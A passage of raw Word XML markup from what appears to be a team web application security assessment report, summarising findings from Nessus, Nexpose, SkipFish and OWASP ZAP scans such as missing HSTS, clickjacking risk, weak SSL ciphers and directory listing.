        <w:t xml:space="preserve"> vulnerability </w:t>
      </w:r>
      <w:r w:rsidR="00A869C5">
        <w:t>information</w:t>
      </w:r>
      <w:r w:rsidR="004E0A65">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00A869C5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D43566">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00254E42">
        <w:t>deemed seve</w:t>
      </w:r>
      <w:r w:rsidR="00D43566">
        <w:t>rity of the vulnerability,</w:t>
      </w:r>
      <w:r w:rsidR="00B76F89">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E00EC3">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="00B76F89">
        <w:t xml:space="preserve">possible remediation </w:t>
      </w:r>
      <w:r w:rsidR="00A13C74">
        <w:t>actions the user c</w:t>
      </w:r>
      <w:r w:rsidR="0045088E">
        <w:t>an</w:t>
      </w:r>
      <w:r w:rsidR="00A13C74">
        <w:t xml:space="preserve"> take </w:t>
      </w:r>
      <w:r w:rsidR="003D7BFF">
        <w:t xml:space="preserve">to test for </w:t>
      </w:r>
      <w:r w:rsidR="004B3C3D">
        <w:t>the presence of the security issue</w:t>
      </w:r>
      <w:r w:rsidR="00EF020B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8A0793" w14:textId="7922CC40" w:rsidR="001F5B80" w:rsidRDefault="001F5B80" w:rsidP="00E77D9E">
      <w:r>
        <w:t xml:space="preserve">When selecting </w:t>
      </w:r>
      <w:r w:rsidR="0052772D">
        <w:t>the type of scan,</w:t>
      </w:r>
      <w:r w:rsidR="00AF2441">
        <w:t xml:space="preserve"> there are various </w:t>
      </w:r>
      <w:r w:rsidR="00607EA4">
        <w:t xml:space="preserve">scan template </w:t>
      </w:r>
      <w:r w:rsidR="00AF2441">
        <w:t>options</w:t>
      </w:r>
      <w:r w:rsidR="002B1524">
        <w:t xml:space="preserve"> available</w:t>
      </w:r>
      <w:r w:rsidR="00607EA4">
        <w:t xml:space="preserve"> that could be used </w:t>
      </w:r>
      <w:r w:rsidR="00EB6B93">
        <w:t>based on the nature of the system or network.</w:t>
      </w:r>
      <w:r w:rsidR="00A56835">
        <w:t xml:space="preserve"> In </w:t>
      </w:r>
      <w:r w:rsidR="004C5A09">
        <w:t xml:space="preserve">this </w:t>
      </w:r>
      <w:r w:rsidR="00A56835">
        <w:t>case</w:t>
      </w:r>
      <w:r w:rsidR="0009432A">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00235BCF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00340F50">
        <w:t xml:space="preserve">Web Application </w:t>
      </w:r>
      <w:r w:rsidR="009D75B4">
        <w:t xml:space="preserve">Tests </w:t>
      </w:r>
      <w:r w:rsidR="006D1141">
        <w:t>were</w:t>
      </w:r>
      <w:r w:rsidR="009D75B4">
        <w:t xml:space="preserve"> selected</w:t>
      </w:r>
      <w:r w:rsidR="001C342E">
        <w:t xml:space="preserve"> to discover the web application vulnerabilities </w:t>
      </w:r>
      <w:r w:rsidR="00A31CB5">
        <w:t xml:space="preserve">which are </w:t>
      </w:r>
      <w:r w:rsidR="008D3E70">
        <w:t>ranked based on the vulnerability severity table</w:t>
      </w:r>
      <w:r w:rsidR="006717A3">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00936EED">
        <w:t xml:space="preserve"> The </w:t>
      </w:r>
      <w:r w:rsidR="00A45324">
        <w:t xml:space="preserve">scan result </w:t>
      </w:r>
      <w:r w:rsidR="00400925">
        <w:t>is shown below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5023945A" w14:textId="56F0179A" w:rsidR="00B21051" w:rsidRDefault="00D46F2A" w:rsidP="00E77D9E">
      <w:r>
        <w:t xml:space="preserve">18 </w:t>
      </w:r>
      <w:r w:rsidR="00936EED">
        <w:t>vulnerabilitie</w:t>
      </w:r>
      <w:r w:rsidR="00F66F56">
        <w:t xml:space="preserve">s </w:t>
      </w:r>
      <w:r w:rsidR="00245705">
        <w:t xml:space="preserve">have </w:t>
      </w:r>
      <w:r w:rsidR="006D1141">
        <w:t xml:space="preserve">been </w:t>
      </w:r>
      <w:r w:rsidR="004F3316">
        <w:t>detected by Nessus</w:t>
      </w:r>
      <w:r w:rsidR="00F66F56">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00882496">
        <w:t xml:space="preserve">the first </w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00882496">
        <w:t xml:space="preserve"> recorded </w:t>
      </w:r>
      <w:r w:rsidR="00924D2F">
        <w:t>are of interest</w:t>
      </w:r>
      <w:r w:rsidR="00BA2877">
        <w:t>, each</w:t>
      </w:r>
      <w:r w:rsidR="00882496">
        <w:t xml:space="preserve"> w</w:t>
      </w:r>
      <w:r w:rsidR="002126F3">
        <w:t>ith</w:t>
      </w:r>
      <w:r w:rsidR="00882496">
        <w:t xml:space="preserve"> medium severity</w:t>
      </w:r>
      <w:r w:rsidR="00BA2877">
        <w:t xml:space="preserve"> ranking</w:t>
      </w:r>
      <w:r w:rsidR="009E2161">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00882496">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">These </w:t>
      </w:r>
      <w:r w:rsidR="001E32D8">
        <w:t xml:space="preserve">weaknesses of the site </w:t>
      </w:r>
      <w:r w:rsidR="00265E8E">
        <w:t>include</w:t>
      </w:r>
      <w:r w:rsidR="001E32D8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00265E8E">
        <w:t xml:space="preserve">possible browsable </w:t>
      </w:r>
      <w:r w:rsidR="00D00405">
        <w:t xml:space="preserve">directories found, </w:t>
      </w:r>
      <w:r w:rsidR="00A13533">
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidR="00713CDD">
        <w:t xml:space="preserve">issing </w:t>
      </w:r>
      <w:r w:rsidR="00880769">
        <w:t xml:space="preserve">strict transport security rules </w:t>
      </w:r>
      <w:r w:rsidR="00F72FB1">
        <w:t>(HSTS)</w:t>
      </w:r>
      <w:r w:rsidR="002808D1">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00880769">
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r w:rsidR="00116A0A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C1626A">
        <w:t>X-</w:t>
      </w:r>
      <w:r w:rsidR="00C9375E">
        <w:t>Frame rules</w:t>
      </w:r>
      <w:r w:rsidR="00B33867">
        <w:t xml:space="preserve"> that </w:t>
      </w:r>
      <w:r w:rsidR="001667E7">
        <w:t xml:space="preserve">could </w:t>
      </w:r>
      <w:r w:rsidR="00B33867">
        <w:t xml:space="preserve">lead to </w:t>
      </w:r>
      <w:r w:rsidR="00057F15">
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00B33867">
        <w:t>lickjacking.</w:t>
      </w:r>
      <w:r w:rsidR="00EC0CD2" w:rsidRPr="00EC0CD2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061B7A6A" w14:textId="53C6414A" w:rsidR="001E2765" w:rsidRDefault="00EC0CD2" w:rsidP="00045DE0">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658257" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="706F550C" wp14:editId="08A9F6D2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>496319</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>601895</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1356930" cy="327619"/>
                <wp:effectExtent l="0" t="0" r="15240" b="15875"/>
                <wp:wrapNone/>
                <wp:docPr id="64" name="Rectangle 64"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1356930" cy="3276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3A198F">
              <v:rect id="Rectangle 64" style="position:absolute;margin-left:39.1pt;margin-top:47.4pt;width:106.85pt;height:25.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CB58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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="007D34BD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A075A94" wp14:editId="65D86B84">
            <wp:extent cx="5943600" cy="278447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14:paraId="4C6BCAD3" w14:textId="77777777" w:rsidR="001E2765" w:rsidRDefault="001E2765" w:rsidP="001E2765"/>
    <w:p w14:paraId="38374143" w14:textId="066EDCD4" w:rsidR="00E94824" w:rsidRDefault="00E94824" w:rsidP="001E2765">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6271F9E9" w14:textId="1ED30535" w:rsidR="001E2765" w:rsidRDefault="001E2765" w:rsidP="007B3C7C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="_Toc93487291"/>
      <w:bookmarkStart w:id="61" w:name="_Toc93502867"/>
      <w:bookmarkStart w:id="62" w:name="_Toc93526900"/>
      <w:bookmarkStart w:id="63" w:name="_Toc94100225"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Nexpose</w:t>
      </w:r>
      <w:bookmarkEnd w:id="60"/>
      <w:bookmarkEnd w:id="61"/>
      <w:bookmarkEnd w:id="62"/>
      <w:bookmarkEnd w:id="63"/>
    </w:p>
    <w:p w14:paraId="35989D7B" w14:textId="29C2EF47" w:rsidR="00277132" w:rsidRPr="00277132" w:rsidRDefault="00277132" w:rsidP="00277132">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r w:rsidRPr="00A46C7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Performed by:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Yi Qian</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D402CE3" w14:textId="77DD070C" w:rsidR="00B50B2E" w:rsidRDefault="000B44C7" w:rsidP="00E77D9E">
      <w:r>
        <w:t xml:space="preserve">Nexpose was used as </w:t>
      </w:r>
      <w:r w:rsidR="004A3BE9">
        <w:t>the second vulnerability scanner</w:t>
      </w:r>
      <w:r w:rsidR="00D45374">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="009C247A">
        <w:t>It identifies</w:t>
      </w:r>
      <w:r w:rsidR="009C0ACB">
        <w:t xml:space="preserve"> active services, open</w:t>
      </w:r>
      <w:r w:rsidR="009704FE">
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="009C0ACB">
        <w:t xml:space="preserve"> ports,</w:t>
      </w:r>
      <w:r w:rsidR="00927A30">
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r w:rsidR="00B83B0E">
        <w:t>nd running applications on the server</w:t>
      </w:r>
      <w:r w:rsidR="00AC2CC4">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B83B0E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AC2CC4">
        <w:t>It</w:t>
      </w:r>
      <w:r w:rsidR="002364F2">
        <w:t xml:space="preserve"> attempt</w:t>
      </w:r>
      <w:r w:rsidR="00AC2CC4">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="002364F2">
        <w:t xml:space="preserve"> to find vulnerabilities based on th</w:t>
      </w:r>
      <w:r w:rsidR="00E97590">
        <w:t>ose</w:t>
      </w:r>
      <w:r w:rsidR="002364F2">
        <w:t xml:space="preserve"> initial information.</w:t>
      </w:r>
      <w:r w:rsidR="00FF61EA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005F4E7C">
        <w:t xml:space="preserve">Upon the input of the web application’s </w:t>
      </w:r>
      <w:r w:rsidR="00AB156A">
        <w:t>address</w:t>
      </w:r>
      <w:r w:rsidR="0081111B">
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r w:rsidR="00F72FB1">
        <w:t xml:space="preserve"> running a full audit without spidering</w:t>
      </w:r>
      <w:r w:rsidR="00612B83">
        <w:t>. V</w:t>
      </w:r>
      <w:r w:rsidR="00FF61EA">
        <w:t xml:space="preserve">ulnerabilities found are based on a </w:t>
      </w:r>
      <w:r w:rsidR="009A51AA">
        <w:t xml:space="preserve">collection of known services and </w:t>
      </w:r>
      <w:r w:rsidR="00F31627">
        <w:t xml:space="preserve">applications deemed </w:t>
      </w:r>
      <w:r w:rsidR="007F0802">
        <w:t>to be</w:t>
      </w:r>
      <w:r w:rsidR="00BB2776">
        <w:t xml:space="preserve"> vulnerab</w:t>
      </w:r>
      <w:r w:rsidR="007F0802">
        <w:t>le</w:t>
      </w:r>
      <w:r w:rsidR="00BB2776">
        <w:t xml:space="preserve"> by Rapid7</w:t>
      </w:r>
      <w:r w:rsidR="00E72986">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="007F0802">
        <w:t>At</w:t>
      </w:r>
      <w:r w:rsidR="00E72986">
        <w:t xml:space="preserve"> the end of the </w:t>
      </w:r>
      <w:r w:rsidR="00FB19FD">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00E72986">
        <w:t xml:space="preserve">can of </w:t>
      </w:r>
      <w:r w:rsidR="00AE461E">
        <w:t>the web application</w:t>
      </w:r>
      <w:r w:rsidR="00C22120">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00147124">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007F0802">
        <w:t xml:space="preserve">a total of </w:t>
      </w:r>
      <w:r w:rsidR="00E7473F">
        <w:t xml:space="preserve">47 vulnerabilities were found </w:t>
      </w:r>
      <w:r w:rsidR="00D54C75">
        <w:t xml:space="preserve">with details </w:t>
      </w:r>
      <w:r w:rsidR="000C4ADA">
        <w:t>shown below</w:t>
      </w:r>
      <w:r w:rsidR="00125B6D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AD8D28" w14:textId="2FC6485C" w:rsidR="000C4ADA" w:rsidRDefault="00B57794" w:rsidP="00E77D9E">
      <w:r>
        <w:t xml:space="preserve">Based on </w:t>
      </w:r>
      <w:r w:rsidR="007F0802">
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidR="004C1B6D">
        <w:t xml:space="preserve"> detailed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> report generated by Nexpose,</w:t>
      </w:r>
      <w:r w:rsidR="00D75A04">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003075A7">
        <w:t>it was</w:t>
      </w:r>
      <w:r w:rsidR="00C63A35">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006275CD">
        <w:t>revealed</w:t>
      </w:r>
      <w:r w:rsidR="00B31316">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003075A7">
        <w:t xml:space="preserve">that the </w:t>
      </w:r>
      <w:r w:rsidR="00A826CE">
        <w:t xml:space="preserve">top few possible weaknesses of the </w:t>
      </w:r>
      <w:r w:rsidR="00C22120">
        <w:t>website</w:t>
      </w:r>
      <w:r w:rsidR="003075A7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00057F15">
        <w:t>include</w:t>
      </w:r>
      <w:r w:rsidR="003075A7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003C0D4F">
        <w:t xml:space="preserve">possible Clickjacking and </w:t>
      </w:r>
      <w:r w:rsidR="00C63A35">
        <w:t>vulnerable SSL</w:t>
      </w:r>
      <w:r w:rsidR="00F72FB1">
        <w:t xml:space="preserve"> ciphers present</w:t>
      </w:r>
      <w:r w:rsidR="00A826CE">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D16C5D" w14:textId="3989A437" w:rsidR="00B82EA0" w:rsidRDefault="00E313B5" w:rsidP="00045DE0">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658259" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="706DB376" wp14:editId="5B937B94">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3272775</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>608641</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="557376" cy="214883"/>
                <wp:effectExtent l="0" t="0" r="14605" b="13970"/>
                <wp:wrapNone/>
                <wp:docPr id="69" name="Rectangle 69"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="557376" cy="2148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034850">
              <v:rect id="Rectangle 69" style="position:absolute;margin-left:257.7pt;margin-top:47.9pt;width:43.9pt;height:16.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AB9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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658258" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="04593CAE" wp14:editId="1E1D0F52">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>363642</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3055279</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5380485" cy="91570"/>
                <wp:effectExtent l="0" t="0" r="10795" b="22860"/>
                <wp:wrapNone/>
                <wp:docPr id="65" name="Rectangle 65"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5380485" cy="915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28726E">
              <v:rect id="Rectangle 65" style="position:absolute;margin-left:28.65pt;margin-top:240.55pt;width:423.65pt;height:7.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DFAA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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="007D34BD" w:rsidRPr="0088714B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="566A9963" wp14:editId="528B5390">
            <wp:extent cx="5585460" cy="3249831"/>
            <wp:effectExtent l="0" t="0" r="0" b="825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72"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5587265" cy="3250881"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="000A4E12">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="554E5703" w14:textId="2D8723B4" w:rsidR="001E2765" w:rsidRDefault="001E2765" w:rsidP="007B3C7C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="64" w:name="_Toc93487292"/>
      <w:bookmarkStart w:id="65" w:name="_Toc93502868"/>
      <w:bookmarkStart w:id="66" w:name="_Toc93526901"/>
      <w:bookmarkStart w:id="67" w:name="_Toc94100226"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>SkipFish</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64"/>
      <w:bookmarkEnd w:id="65"/>
      <w:bookmarkEnd w:id="66"/>
      <w:bookmarkEnd w:id="67"/>
    </w:p>
    <w:p w14:paraId="690A3660" w14:textId="1C7636F0" w:rsidR="00A43C00" w:rsidRPr="00A43C00" w:rsidRDefault="00A43C00" w:rsidP="00A43C00">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r w:rsidRPr="00A46C7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Performed by:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Glenn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E24F628" w14:textId="3400ED17" w:rsidR="001D6919" w:rsidRPr="001D6919" w:rsidRDefault="00102339" w:rsidP="00E77D9E">
      <w:r>
        <w:t>Skip</w:t>
      </w:r>
      <w:r w:rsidR="00FF5B4C">
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:t>ish</w:t>
      </w:r>
      <w:r w:rsidR="001D6919">
        <w:t xml:space="preserve"> is an active web application security reconnaissance tool</w:t>
      </w:r>
      <w:r w:rsidR="00FA5CAB">
        <w:t xml:space="preserve"> that prepares an interactive sitemap for </w:t>
      </w:r>
      <w:r w:rsidR="00C22120">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00FA5CAB">
        <w:t xml:space="preserve">targeted site by recursively crawling </w:t>
      </w:r>
      <w:r w:rsidR="008B72A4">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="00F067E3">
        <w:t>probing the web application. The result</w:t>
      </w:r>
      <w:r w:rsidR="000119B6">
        <w:t xml:space="preserve"> of the outp</w:t>
      </w:r>
      <w:r w:rsidR="00853562">
        <w:t xml:space="preserve">ut </w:t>
      </w:r>
      <w:r w:rsidR="009664E8">
        <w:t>would</w:t>
      </w:r>
      <w:r w:rsidR="008D1150">
        <w:t xml:space="preserve"> generate </w:t>
      </w:r>
      <w:r w:rsidR="009537B4">
        <w:t xml:space="preserve">a report </w:t>
      </w:r>
      <w:r w:rsidR="00D96C3B">
        <w:t xml:space="preserve">that </w:t>
      </w:r>
      <w:r w:rsidR="00367494">
        <w:t xml:space="preserve">identifies security flaws within the </w:t>
      </w:r>
      <w:r w:rsidR="000D4BE9">
        <w:t>web application</w:t>
      </w:r>
      <w:r w:rsidR="00367494">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E45277E" w14:textId="61CD76CC" w:rsidR="00045DE0" w:rsidRDefault="00FC7869" w:rsidP="00FF5B4C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F7A490C" wp14:editId="237AE2F2">
            <wp:extent cx="5943600" cy="207751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37860"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="207751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1C4BAB" w14:paraId="6A7ADB1A" w14:textId="77777777" w:rsidTr="003A55EB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4248" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="040D89A5" w14:textId="329666AA" w:rsidR="001C4BAB" w:rsidRDefault="001C4BAB">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A939126" wp14:editId="1BC183F1">
                  <wp:extent cx="2558037" cy="303466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0841" cy="3049855"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5102" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="166637E4" w14:textId="563F34D0" w:rsidR="001C4BAB" w:rsidRDefault="001C4BAB" w:rsidP="001C4BAB">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Based on the report generated by SkipFish, it has detected multiple security issues within the web application consisting of 20 different vulnerabilities. It revealed a critical vulnerability known as shell injection vector. However, upon reviewing the response, it was a false positive result due to the Web Application Firewall. Other weaknesses include Cross-Site Request Forgery vulnerability and directory listing enabled. It also revealed that the web application has security misconfigurations as some server errors were revealed during the scan.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3A18210C" w14:textId="77777777" w:rsidR="001C4BAB" w:rsidRDefault="001C4BAB"/>
    <w:p w14:paraId="0A513097" w14:textId="5C0E86B1" w:rsidR="00E94824" w:rsidRDefault="00E94824" w:rsidP="00045DE0">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AA60694" w14:textId="77777777" w:rsidR="001C4BAB" w:rsidRDefault="001C4BAB">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="68" w:name="_Toc93487293"/>
      <w:bookmarkStart w:id="69" w:name="_Toc93502869"/>
      <w:bookmarkStart w:id="70" w:name="_Toc93526902"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="473EBE5A" w14:textId="5FF8E640" w:rsidR="00371164" w:rsidRDefault="00064FE7" w:rsidP="007B3C7C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="71" w:name="_Toc94100227"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">OWASP ZAP </w:t>
      </w:r>
      <w:r w:rsidR="00371164">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="003A0061">
        <w:t>Active</w:t>
      </w:r>
      <w:r w:rsidR="00371164">
        <w:t xml:space="preserve"> Scan)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="68"/>
      <w:bookmarkEnd w:id="69"/>
      <w:bookmarkEnd w:id="70"/>
      <w:bookmarkEnd w:id="71"/>
    </w:p>
    <w:p w14:paraId="519181CC" w14:textId="1735DEAA" w:rsidR="00A43C00" w:rsidRPr="00A43C00" w:rsidRDefault="00A43C00" w:rsidP="00A43C00">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r w:rsidRPr="00A46C7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Performed by:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Glenn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A93EF7" w14:textId="2906B05C" w:rsidR="00064FE7" w:rsidRDefault="00064FE7" w:rsidP="00E77D9E">
      <w:r>
        <w:t xml:space="preserve">ZAP includes an active scanner </w:t>
      </w:r>
      <w:r w:rsidR="00AF419A">
        <w:t>that attempts to find potential vulnerabilities by using known attacks against the web application.</w:t>
      </w:r>
      <w:r w:rsidR="003A0061">
        <w:t xml:space="preserve"> The </w:t>
      </w:r>
      <w:r w:rsidR="00E4511E">
        <w:t xml:space="preserve">active scan </w:t>
      </w:r>
      <w:r w:rsidR="00A17E4F">
        <w:t xml:space="preserve">modifies </w:t>
      </w:r>
      <w:r w:rsidR="00E4511E">
        <w:t xml:space="preserve">data and </w:t>
      </w:r>
      <w:r w:rsidR="28D51C03">
        <w:t>inserts</w:t>
      </w:r>
